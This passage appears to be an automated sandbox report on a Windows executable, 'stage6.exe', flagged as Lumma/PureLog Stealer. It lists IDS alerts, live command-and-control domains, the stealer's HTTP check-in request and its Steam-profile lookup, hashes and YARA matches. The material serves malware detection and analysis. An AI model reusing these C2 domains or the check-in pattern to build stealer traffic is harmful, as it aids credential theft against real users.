ProductVersion	1.0.0.0
Assembly Version	1.0.0.0

Network Behavior

Download Network PCAP: filtered – full

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-04-27T05:33:12.042328+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49713	104.21.32.1	443	TCP
2025-04-27T05:33:31.658514+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49713	104.21.32.1	443	TCP
2025-04-27T05:33:31.658514+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49713	104.21.32.1	443	TCP
2025-04-27T05:33:31.666749+0200	2058364	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)	1	192.168.2.4	62128	1.1.1.1	53	UDP
2025-04-27T05:33:31.839059+0200	2058360	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)	1	192.168.2.4	53817	1.1.1.1	53	UDP
2025-04-27T05:33:31.997019+0200	2058370	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat)	1	192.168.2.4	63267	1.1.1.1	53	UDP
2025-04-27T05:33:32.159469+0200	2058362	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat)	1	192.168.2.4	60567	1.1.1.1	53	UDP
2025-04-27T05:33:32.325443+0200	2058354	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat)	1	192.168.2.4	57042	1.1.1.1	53	UDP
2025-04-27T05:33:32.490041+0200	2058376	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat)	1	192.168.2.4	64227	1.1.1.1	53	UDP
2025-04-27T05:33:32.653417+0200	2058358	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat)	1	192.168.2.4	55368	1.1.1.1	53	UDP
2025-04-27T05:33:32.822532+0200	2058374	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat)	1	192.168.2.4	58847	1.1.1.1	53	UDP
2025-04-27T05:33:33.426687+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49722	23.52.218.12	443	TCP
2025-04-27T05:33:33.824801+0200	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.4	49722	23.52.218.12	443	TCP

Network Port Distribution

Total Packets: 35
• 443 (HTTPS)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 27, 2025 05:33:11.726566076 CEST	49713	443	192.168.2.4	104.21.32.1
Apr 27, 2025 05:33:11.726603031 CEST	443	49713	104.21.32.1	192.168.2.4
Apr 27, 2025 05:33:11.726680040 CEST	49713	443	192.168.2.4	104.21.32.1
Apr 27, 2025 05:33:11.729679108 CEST	49713	443	192.168.2.4	104.21.32.1
Apr 27, 2025 05:33:11.729693890 CEST	443	49713	104.21.32.1	192.168.2.4
Apr 27, 2025 05:33:12.042243004 CEST	443	49713	104.21.32.1	192.168.2.4
Apr 27, 2025 05:33:12.042327881 CEST	49713	443	192.168.2.4	104.21.32.1
Apr 27, 2025 05:33:12.049531937 CEST	49713	443	192.168.2.4	104.21.32.1
Apr 27, 2025 05:33:12.049551010 CEST	443	49713	104.21.32.1	192.168.2.4
Apr 27, 2025 05:33:12.049751043 CEST	443	49713	104.21.32.1	192.168.2.4
Apr 27, 2025 05:33:12.101322889 CEST	49713	443	192.168.2.4	104.21.32.1
Apr 27, 2025 05:33:12.137073994 CEST	49713	443	192.168.2.4	104.21.32.1
Apr 27, 2025 05:33:12.137115955 CEST	49713	443	192.168.2.4	104.21.32.1
Apr 27, 2025 05:33:12.137160063 CEST	443	49713	104.21.32.1	192.168.2.4
Apr 27, 2025 05:33:31.658548117 CEST	443	49713	104.21.32.1	192.168.2.4
Apr 27, 2025 05:33:31.658611059 CEST	443	49713	104.21.32.1	192.168.2.4
Apr 27, 2025 05:33:31.658682108 CEST	49713	443	192.168.2.4	104.21.32.1
Apr 27, 2025 05:33:31.659921885 CEST	49713	443	192.168.2.4	104.21.32.1
Apr 27, 2025 05:33:31.659939051 CEST	443	49713	104.21.32.1	192.168.2.4
Apr 27, 2025 05:33:33.138675928 CEST	49722	443	192.168.2.4	23.52.218.12
Apr 27, 2025 05:33:33.138710022 CEST	443	49722	23.52.218.12	192.168.2.4
Apr 27, 2025 05:33:33.138773918 CEST	49722	443	192.168.2.4	23.52.218.12
Apr 27, 2025 05:33:33.139448881 CEST	49722	443	192.168.2.4	23.52.218.12
Apr 27, 2025 05:33:33.139461040 CEST	443	49722	23.52.218.12	192.168.2.4
Apr 27, 2025 05:33:33.426487923 CEST	443	49722	23.52.218.12	192.168.2.4
Apr 27, 2025 05:33:33.426687002 CEST	49722	443	192.168.2.4	23.52.218.12
Apr 27, 2025 05:33:33.428261042 CEST	49722	443	192.168.2.4	23.52.218.12
Apr 27, 2025 05:33:33.428268909 CEST	443	49722	23.52.218.12	192.168.2.4
Apr 27, 2025 05:33:33.428463936 CEST	443	49722	23.52.218.12	192.168.2.4
Apr 27, 2025 05:33:33.429790020 CEST	49722	443	192.168.2.4	23.52.218.12
Apr 27, 2025 05:33:33.476273060 CEST	443	49722	23.52.218.12	192.168.2.4
Apr 27, 2025 05:33:33.824841022 CEST	443	49722	23.52.218.12	192.168.2.4
Apr 27, 2025 05:33:33.824863911 CEST	443	49722	23.52.218.12	192.168.2.4
Apr 27, 2025 05:33:33.824877024 CEST	443	49722	23.52.218.12	192.168.2.4
Apr 27, 2025 05:33:33.824939966 CEST	49722	443	192.168.2.4	23.52.218.12
Apr 27, 2025 05:33:33.824959993 CEST	443	49722	23.52.218.12	192.168.2.4
Apr 27, 2025 05:33:33.824987888 CEST	49722	443	192.168.2.4	23.52.218.12
Apr 27, 2025 05:33:33.825016022 CEST	49722	443	192.168.2.4	23.52.218.12
Apr 27, 2025 05:33:33.962210894 CEST	443	49722	23.52.218.12	192.168.2.4
Apr 27, 2025 05:33:33.962259054 CEST	443	49722	23.52.218.12	192.168.2.4
Apr 27, 2025 05:33:33.962311983 CEST	49722	443	192.168.2.4	23.52.218.12
Apr 27, 2025 05:33:33.962336063 CEST	443	49722	23.52.218.12	192.168.2.4
Apr 27, 2025 05:33:33.962385893 CEST	49722	443	192.168.2.4	23.52.218.12
Apr 27, 2025 05:33:33.974440098 CEST	443	49722	23.52.218.12	192.168.2.4
Apr 27, 2025 05:33:33.974508047 CEST	443	49722	23.52.218.12	192.168.2.4
Apr 27, 2025 05:33:33.974555016 CEST	49722	443	192.168.2.4	23.52.218.12
Apr 27, 2025 05:33:33.974594116 CEST	49722	443	192.168.2.4	23.52.218.12
Apr 27, 2025 05:33:33.974724054 CEST	49722	443	192.168.2.4	23.52.218.12
Apr 27, 2025 05:33:33.974735975 CEST	443	49722	23.52.218.12	192.168.2.4
Apr 27, 2025 05:33:33.974750996 CEST	49722	443	192.168.2.4	23.52.218.12
Apr 27, 2025 05:33:33.974756002 CEST	443	49722	23.52.218.12	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 27, 2025 05:33:11.546150923 CEST	61987	53	192.168.2.4	1.1.1.1
Apr 27, 2025 05:33:11.719497919 CEST	53	61987	1.1.1.1	192.168.2.4
Apr 27, 2025 05:33:31.666749001 CEST	62128	53	192.168.2.4	1.1.1.1
Apr 27, 2025 05:33:31.835705042 CEST	53	62128	1.1.1.1	192.168.2.4
Apr 27, 2025 05:33:31.839059114 CEST	53817	53	192.168.2.4	1.1.1.1
Apr 27, 2025 05:33:31.993983030 CEST	53	53817	1.1.1.1	192.168.2.4
Apr 27, 2025 05:33:31.997019053 CEST	63267	53	192.168.2.4	1.1.1.1
Apr 27, 2025 05:33:32.156656981 CEST	53	63267	1.1.1.1	192.168.2.4
Apr 27, 2025 05:33:32.159468889 CEST	60567	53	192.168.2.4	1.1.1.1
Apr 27, 2025 05:33:32.322485924 CEST	53	60567	1.1.1.1	192.168.2.4
Apr 27, 2025 05:33:32.325443029 CEST	57042	53	192.168.2.4	1.1.1.1
Apr 27, 2025 05:33:32.487524033 CEST	53	57042	1.1.1.1	192.168.2.4
Apr 27, 2025 05:33:32.490041018 CEST	64227	53	192.168.2.4	1.1.1.1
Apr 27, 2025 05:33:32.650350094 CEST	53	64227	1.1.1.1	192.168.2.4
Apr 27, 2025 05:33:32.653417110 CEST	55368	53	192.168.2.4	1.1.1.1
Apr 27, 2025 05:33:32.819885015 CEST	53	55368	1.1.1.1	192.168.2.4
Apr 27, 2025 05:33:32.822531939 CEST	58847	53	192.168.2.4	1.1.1.1
Apr 27, 2025 05:33:32.995897055 CEST	53	58847	1.1.1.1	192.168.2.4
Apr 27, 2025 05:33:32.997597933 CEST	60713	53	192.168.2.4	1.1.1.1
Apr 27, 2025 05:33:33.137676001 CEST	53	60713	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 27, 2025 05:33:11.546150923 CEST	192.168.2.4	1.1.1.1	0x2817	Standard query (0)	surmisehotte.click	A (IP address)	IN (0x0001)	false
Apr 27, 2025 05:33:31.666749001 CEST	192.168.2.4	1.1.1.1	0x45e7	Standard query (0)	grannyejh.lat	A (IP address)	IN (0x0001)	false
Apr 27, 2025 05:33:31.839059114 CEST	192.168.2.4	1.1.1.1	0x3872	Standard query (0)	discokeyus.lat	A (IP address)	IN (0x0001)	false
Apr 27, 2025 05:33:31.997019053 CEST	192.168.2.4	1.1.1.1	0xce15	Standard query (0)	necklacebudi.lat	A (IP address)	IN (0x0001)	false
Apr 27, 2025 05:33:32.159468889 CEST	192.168.2.4	1.1.1.1	0x3cb9	Standard query (0)	energyaffai.lat	A (IP address)	IN (0x0001)	false
Apr 27, 2025 05:33:32.325443029 CEST	192.168.2.4	1.1.1.1	0x230f	Standard query (0)	aspecteirs.lat	A (IP address)	IN (0x0001)	false
Apr 27, 2025 05:33:32.490041018 CEST	192.168.2.4	1.1.1.1	0x6450	Standard query (0)	sustainskelet.lat	A (IP address)	IN (0x0001)	false
Apr 27, 2025 05:33:32.653417110 CEST	192.168.2.4	1.1.1.1	0x661d	Standard query (0)	crosshuaht.lat	A (IP address)	IN (0x0001)	false
Apr 27, 2025 05:33:32.822531939 CEST	192.168.2.4	1.1.1.1	0xc23a	Standard query (0)	rapeflowwj.lat	A (IP address)	IN (0x0001)	false
Apr 27, 2025 05:33:32.997597933 CEST	192.168.2.4	1.1.1.1	0x5c1f	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 27, 2025 05:33:11.719497919 CEST	1.1.1.1	192.168.2.4	0x2817	No error (0)	surmisehotte.click		104.21.32.1	A (IP address)	IN (0x0001)	false
Apr 27, 2025 05:33:11.719497919 CEST	1.1.1.1	192.168.2.4	0x2817	No error (0)	surmisehotte.click		104.21.80.1	A (IP address)	IN (0x0001)	false
Apr 27, 2025 05:33:11.719497919 CEST	1.1.1.1	192.168.2.4	0x2817	No error (0)	surmisehotte.click		104.21.64.1	A (IP address)	IN (0x0001)	false
Apr 27, 2025 05:33:11.719497919 CEST	1.1.1.1	192.168.2.4	0x2817	No error (0)	surmisehotte.click		104.21.48.1	A (IP address)	IN (0x0001)	false
Apr 27, 2025 05:33:11.719497919 CEST	1.1.1.1	192.168.2.4	0x2817	No error (0)	surmisehotte.click		104.21.112.1	A (IP address)	IN (0x0001)	false
Apr 27, 2025 05:33:11.719497919 CEST	1.1.1.1	192.168.2.4	0x2817	No error (0)	surmisehotte.click		104.21.96.1	A (IP address)	IN (0x0001)	false
Apr 27, 2025 05:33:11.719497919 CEST	1.1.1.1	192.168.2.4	0x2817	No error (0)	surmisehotte.click		104.21.16.1	A (IP address)	IN (0x0001)	false
Apr 27, 2025 05:33:31.835705042 CEST	1.1.1.1	192.168.2.4	0x45e7	Name error (3)	grannyejh.lat	none	none	A (IP address)	IN (0x0001)	false
Apr 27, 2025 05:33:31.993983030 CEST	1.1.1.1	192.168.2.4	0x3872	Name error (3)	discokeyus.lat	none	none	A (IP address)	IN (0x0001)	false
Apr 27, 2025 05:33:32.156656981 CEST	1.1.1.1	192.168.2.4	0xce15	Name error (3)	necklacebudi.lat	none	none	A (IP address)	IN (0x0001)	false
Apr 27, 2025 05:33:32.322485924 CEST	1.1.1.1	192.168.2.4	0x3cb9	Name error (3)	energyaffai.lat	none	none	A (IP address)	IN (0x0001)	false
Apr 27, 2025 05:33:32.487524033 CEST	1.1.1.1	192.168.2.4	0x230f	Name error (3)	aspecteirs.lat	none	none	A (IP address)	IN (0x0001)	false
Apr 27, 2025 05:33:32.650350094 CEST	1.1.1.1	192.168.2.4	0x6450	Name error (3)	sustainskelet.lat	none	none	A (IP address)	IN (0x0001)	false
Apr 27, 2025 05:33:32.819885015 CEST	1.1.1.1	192.168.2.4	0x661d	Name error (3)	crosshuaht.lat	none	none	A (IP address)	IN (0x0001)	false
Apr 27, 2025 05:33:32.995897055 CEST	1.1.1.1	192.168.2.4	0xc23a	Name error (3)	rapeflowwj.lat	none	none	A (IP address)	IN (0x0001)	false
Apr 27, 2025 05:33:33.137676001 CEST	1.1.1.1	192.168.2.4	0x5c1f	No error (0)	steamcommunity.com		23.52.218.12	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

surmisehotte.click

steamcommunity.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49713	104.21.32.1	443	6536	C:\Users\user\Desktop\stage6.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-27 03:33:12 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: surmisehotte.click
2025-04-27 03:33:12 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-04-27 03:33:31 UTC	238	IN	HTTP/1.1 522 <none> Date: Sun, 27 Apr 2025 03:33:31 GMT Content-Length: 0 Connection: close Server: cloudflare Cache-Control: private, no-store Cf-Cache-Status: DYNAMIC CF-RAY: 936b41cfe8c60fe5-LAX alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49722	23.52.218.12	443	6536	C:\Users\user\Desktop\stage6.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-27 03:33:33 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2025-04-27 03:33:33 UTC	1974	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 X-Frame-Options: SAMEORIGIN Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sun, 27 Apr 2025 03:33:33 GMT Content-Length: 29965 Connection: close Set-Cookie: sessionid=ad7b0c4e88d72b577c8b6cfa; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Ccf72e8d7385b2d4d64dd054efa94cd8a; path=/; secure; HttpOnly; SameSite=None
2025-04-27 03:33:33 UTC	14410	IN	Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"
2025-04-27 03:33:33 UTC	10166	IN	Data Raw: 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 64 69 73 63 75 73 73 69 6f 6e 73 2f 22 3e 0a 09 09 09 09 09 09 44 69 73 63 75 73 73 69 6f 6e 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 77 6f 72 6b 73 68 6f 70 2f 22 3e 0a 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e Data Ascii: href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="submenuitem" href="https://steamcommun
2025-04-27 03:33:33 UTC	5389	IN	Data Raw: 69 74 79 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 42 41 53 45 5f 55 52 4c 5f 53 48 41 52 45 44 5f 43 44 4e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 68 61 72 65 64 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4c 41 4e 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6c 61 6e 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 4e 52 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 32 5f 31 30 30 33 30 30 5f 70 72 6f 66 69 6c 65 5f 26 71 75 6f 74 3b 7d 22 20 64 61 74 61 2d 75 73 65 72 69 6e 66 6f 3d 22 5b 5d 22 20 64 Data Ascii: ity","BASE_URL_SHARED_CDN":"https:\/\/shared.cloudflare.steamstatic.com\/","CLAN_CDN_ASSET_URL":"https:\/\/clan.cloudflare.steamstatic.com\/","SNR":"2_100300_profile_"}" data-userinfo="[]" d

Statistics

CPU Usage

• stage6.exe
• stage6.exe

Click to jump to process

Memory Usage

• stage6.exe
• stage6.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry

Click to dive into process behavior distribution

Click to jump to process

Target ID:	0
Start time:	23:33:10
Start date:	26/04/2025
Path:	C:\Users\user\Desktop\stage6.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\stage6.exe"
Imagebase:	0xe80000
File size:	1'657'856 bytes
MD5 hash:	03BE1EE0944764446CD61BE6AE8CC497
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1157918429.0000000005E20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1135848711.0000000000E82000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1145306123.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	23:33:10
Start date:	26/04/2025
Path:	C:\Users\user\Desktop\stage6.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\stage6.exe"
Imagebase:	0x5d0000
File size:	1'657'856 bytes
MD5 hash:	03BE1EE0944764446CD61BE6AE8CC497
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Function 0670EA48 Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

Dq, xrefs: 0670EB4D

Memory Dump Source

Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd

Similarity

API ID:
String ID: Dq
API String ID: 0-144822681
Opcode ID: 93b9533fab7cd42d01dd1e46e35eccb3af9b4e41fc02121211e619969f63ecc2
Instruction ID: 8582d0fcf67046d17e030920701600936e9f215caca254fc3367352e0c25ecbf
Opcode Fuzzy Hash: 93b9533fab7cd42d01dd1e46e35eccb3af9b4e41fc02121211e619969f63ecc2
Instruction Fuzzy Hash: 57D19074A00218CFDB54DFA9D994B9DBBF2BF88300F1085A9D509AB3A5DB35A981CF50

Function 016B1F98 Relevance: 3.3, Strings: 2, Instructions: 844COMMON

Download Yara Rule

Strings

4'q, xrefs: 016B2A09
4'q, xrefs: 016B29F9

Memory Dump Source

Source File: 00000000.00000002.1144460887.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16b0000_stage6.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 860519358ff35d0e476e47a5b32ec813d45fb0b681699a10bcbc39bcc01126bc
Instruction ID: ebb9ef55d7d178f519c2b93dd836d57b0d93de2d31920478dc28cc1fa8692957
Opcode Fuzzy Hash: 860519358ff35d0e476e47a5b32ec813d45fb0b681699a10bcbc39bcc01126bc
Instruction Fuzzy Hash: D3725A74E15349CFDB16DBA9C8A8AEEBBB1FF49301F11805AD511AB391C7346882CF61

Function 016B2D70 Relevance: 2.9, Strings: 2, Instructions: 362COMMON

Download Yara Rule

Strings

4'q, xrefs: 016B3206
4'q, xrefs: 016B3216

Memory Dump Source

Source File: 00000000.00000002.1144460887.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16b0000_stage6.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 6d44635f27adcdef95fa61db50ea34eee7555dc1f9253ce89d6fea10c877f025
Instruction ID: 7e0f70356837790828cade82eec5216348ae3a4782922d2488087e48dffbe164
Opcode Fuzzy Hash: 6d44635f27adcdef95fa61db50ea34eee7555dc1f9253ce89d6fea10c877f025
Instruction Fuzzy Hash: 27F1D434E11219DFCB19DFA9E9986ECBBB6FF89312F204029E416A7354CB356985CF10

Function 016B3940 Relevance: 2.8, Strings: 2, Instructions: 279COMMON

Download Yara Rule

Strings

4'q, xrefs: 016B3CBF
4'q, xrefs: 016B3CCF

Memory Dump Source

Source File: 00000000.00000002.1144460887.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16b0000_stage6.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 3beac9650a51621057820d59de8dab9365953b8a7d1730594e6abdeb97adb630
Instruction ID: e02a341cf4040f17149bb05e634e59fc76bbff80f48c20e9ab6d0108c00b6f4e
Opcode Fuzzy Hash: 3beac9650a51621057820d59de8dab9365953b8a7d1730594e6abdeb97adb630
Instruction Fuzzy Hash: 74C1A534E0020ACFDB19EFA9D8946EDBBB2FB49301F108129D5166B394DB355986CF50

Function 016B391F Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

4'q, xrefs: 016B3CBF

Memory Dump Source

Source File: 00000000.00000002.1144460887.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16b0000_stage6.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: b9639caf187a73d3ae9152b7298e684b4c1313f905290d0a2d3d0c795f8fb90b
Instruction ID: 07a8221e1308393b7560ff97609290d492591c18f053ad3666a6fd3c03e53e12
Opcode Fuzzy Hash: b9639caf187a73d3ae9152b7298e684b4c1313f905290d0a2d3d0c795f8fb90b
Instruction Fuzzy Hash: 48311C75E04349CFDB0ADFAAC9942EDBBB2BF85300F14806AC155AB391EB344986CF51

Function 066F40C5 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

1, xrefs: 066F9E50

Memory Dump Source

Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd

Similarity

API ID:
String ID: 1
API String ID: 0-2212294583
Opcode ID: 8c59e162a3d0c1eb1b2f11893f75d0d75877bc3351c6bba76a459b938e1a4b23
Instruction ID: 1d8b68c3030c2619fcf9196294a3f9c7f79bf62d40c5e7a09a5da61f388f9bef
Opcode Fuzzy Hash: 8c59e162a3d0c1eb1b2f11893f75d0d75877bc3351c6bba76a459b938e1a4b23
Instruction Fuzzy Hash: 7D311D78A15219CFCBA5DF18C898A99B7B1FB48340F1051E9E91DA7394CB346EC1CF51

Function 066F5257 Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

1, xrefs: 066F9E50

Memory Dump Source

Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd

Similarity

API ID:
String ID: 1
API String ID: 0-2212294583
Opcode ID: 2b1b388728e8d7483e36d55f06a5e104739bce15d8f9e2739ea56181521a5817
Instruction ID: 354079fd6c32ab321cec7ea2738b9279ee201e71bd819f80cd819f65405c99c0
Opcode Fuzzy Hash: 2b1b388728e8d7483e36d55f06a5e104739bce15d8f9e2739ea56181521a5817
Instruction Fuzzy Hash: 07211D78915229CFCBA5DF24C898AA9B7B2FB48340F1040E9E50DA7384CB306EC1CF51

Function 066F379B Relevance: 1.3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

Strings

$, xrefs: 066F3830

Memory Dump Source

Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 2b856781b9b973e29d9ae1057c928da0cf4fa1df2eb8d9c8275206dc6cc762d7
Instruction ID: dd9c3c67034dbe6a5d4c7b356e8d201aabd3b5bd7efb2de8c38edfab19b5b0cf
Opcode Fuzzy Hash: 2b856781b9b973e29d9ae1057c928da0cf4fa1df2eb8d9c8275206dc6cc762d7
Instruction Fuzzy Hash: 2D111438A10219CFDB60EF28D888BDAB7B2EB48304F0040D9A519A7390CB349EC58F90

Function 066F5C8C Relevance: .1, Instructions: 56COMMON

Download Yara Rule
